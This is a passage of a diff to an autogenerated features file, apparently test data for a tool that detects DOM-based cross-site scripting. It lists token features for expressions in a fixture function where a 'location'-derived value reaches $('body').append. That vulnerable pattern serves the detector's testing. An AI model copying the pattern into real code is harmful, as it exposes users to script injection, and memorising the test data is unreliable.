enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | 'arguments' object of function basicExceptions | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | exceptional return of function basicExceptions | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | exceptional return of function basicExceptions | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | exceptional return of function basicExceptions | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | exceptional return of function basicExceptions | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | exceptional return of function basicExceptions | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | functio ... OK\\n\\t}\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | functio ... OK\\n\\t}\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | functio ... OK\\n\\t}\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | return of function basicExceptions | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | return of function basicExceptions | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | return of function basicExceptions | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | return of function basicExceptions | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | return of function basicExceptions | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:299:10:299:24 | basicExceptions | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:299:10:299:24 | basicExceptions | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:299:10:299:24 | basicExceptions | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:301:9:301:16 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:301:9:301:16 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:301:9:301:16 | location | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:301:9:301:16 | location | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:301:9:301:16 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:302:10:302:10 | e | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:302:10:302:10 | e | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:302:10:302:10 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:302:10:302:10 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:302:10:302:10 | e | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:302:10:302:10 | e | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:302:10:302:10 | e | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:302:10:302:10 | e | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:302:10:302:10 | e | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:302:10:302:10 | e | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:3 | $ | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:3 | $ | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:11 | $("body") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:11 | $("body") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:11 | $("body") | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:11 | $("body") | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:11 | $("body") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:11 | exceptional return of $("body") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:11 | exceptional return of $("body") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:11 | exceptional return of $("body") | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:11 | exceptional return of $("body") | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:11 | exceptional return of $("body") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:18 | $("body").append | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:18 | $("body").append | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:18 | $("body").append | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:18 | $("body").append | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:18 | $("body").append | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:21 | $("body").append(e) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:21 | $("body").append(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:21 | $("body").append(e) | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:21 | $("body").append(e) | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:21 | $("body").append(e) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:21 | exceptional return of $("body").append(e) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:21 | exceptional return of $("body").append(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:21 | exceptional return of $("body").append(e) | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:21 | exceptional return of $("body").append(e) | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:303:3:303:21 | exceptional return of $("body").append(e) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:303:5:303:10 | "body" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:303:5:303:10 | "body" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:303:5:303:10 | "body" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17198,6 +119442,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:303:5:303:10 | "body" | enclosingFunctionBody | location e $ body append e location e $ body append e | | autogenerated/Xss/DomBasedXss/tst.js:303:5:303:10 | "body" | enclosingFunctionName | basicExceptions | | autogenerated/Xss/DomBasedXss/tst.js:303:5:303:10 | "body" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:303:13:303:18 | append | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:303:13:303:18 | append | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:303:13:303:18 | append | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:303:13:303:18 | append | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:303:13:303:18 | append | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:303:20:303:20 | e | CalleeFlexibleAccessPath | $().append | | autogenerated/Xss/DomBasedXss/tst.js:303:20:303:20 | e | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:303:20:303:20 | e | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17205,6 +119454,51 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:303:20:303:20 | e | enclosingFunctionBody | location e $ body append e location e $ body append e | | autogenerated/Xss/DomBasedXss/tst.js:303:20:303:20 | e | enclosingFunctionName | basicExceptions | | autogenerated/Xss/DomBasedXss/tst.js:303:20:303:20 | e | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:308:10:308:17 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:308:10:308:17 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:308:10:308:17 | location | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:308:10:308:17 | location | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:308:10:308:17 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:310:10:310:10 | e | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:310:10:310:10 | e | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:310:10:310:10 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:310:10:310:10 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:310:10:310:10 | e | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:310:10:310:10 | e | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:310:10:310:10 | e | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:310:10:310:10 | e | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:310:10:310:10 | e | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:310:10:310:10 | e | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:3 | $ | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:3 | $ | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:11 | $("body") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:11 | $("body") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:11 | $("body") | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:11 | $("body") | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:11 | $("body") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:11 | exceptional return of $("body") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:11 | exceptional return of $("body") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:11 | exceptional return of $("body") | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:11 | exceptional return of $("body") | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:11 | exceptional return of $("body") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:18 | $("body").append | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:18 | $("body").append | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:18 | $("body").append | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:18 | $("body").append | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:18 | $("body").append | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:21 | $("body").append(e) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| 